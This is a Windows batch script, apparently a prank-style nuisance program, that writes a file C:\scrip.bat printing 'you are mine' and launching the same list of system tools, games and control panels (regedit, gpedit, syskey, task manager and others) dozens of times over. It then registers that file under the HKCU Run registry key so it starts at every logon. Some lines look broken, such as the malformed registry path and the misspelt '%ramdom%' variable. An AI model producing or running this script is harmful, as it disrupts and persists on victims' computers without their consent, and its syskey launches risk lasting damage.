@echo off
cd C:\
copy con scrip.bat

start 
echo you are mine
start notepad.exe 
start notepad.exe 
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start clipbrd.exe
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start clipbrd.exe
start notepad.exe 
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start clipbrd.exe
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc
start calc.exe
start devmgmt.msc
start dfrg.msc
start eudcedit.exe
start appwiz.cpl
start access.cpl
start accwiz.exe
start desk.cpl
start eventvwr.exe
start freecell.exe
start fsmgmt.msc
start hdwwiz.cpl
start iexpress.exe
start inetcpl.cpl
start ntl.cpl 
start joy.cpl 
start magnify.exe 
start main.cpl
start mmsys.cpl 
start mspaint.exe 
start narrator.exe 
start ntbackup.exe 
start nusrmgr.cpl 
start osk.exe 
start telnet.exe
start spider.exe 
start gpedit.msc 
start msconfig.exe 
start verifier.exe 
start drwtsn32.exe 
start dxdiag.exe
start mobsync.exe 
start mplay32.exe 
start odbcad32.exe 
start packager.exe 
start perfmon.exe 
start progman.exe 
start rasphone.exe 
start shrpubw.exe 
start sigverif.exe 
start sysedit.exe 
start syskey.exe 
start sndrec32.exe 
start timedate.cpl 
start scrnsave.scr
start winchat.exe 
start winmine.exe 
start write.exe 
start wupdmgr.exe 
start explorer.exe
start powercfg.cpl
start rasphone.exe 
start regedt32.exe 
start regedit.exe 
start sndvol32.exe 
start notepad.exe 
start taskmgr.exe 
start compmgmt.msc

start 
start regedit.exe
start write.exe
start HelpPane.exe
start calc.exe
start 
start 
start write.exe
start 
start 
start write.exe
start 
start write.exe
start 
start write.exe
start 
start 
start 
start 
start 
start 
start 
start 
start 
start 
start 
start 
start 
start 


^Z
REG ADD Equipo\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DAT /d C:\scrip.bat
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
echo %ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%%ramdom%
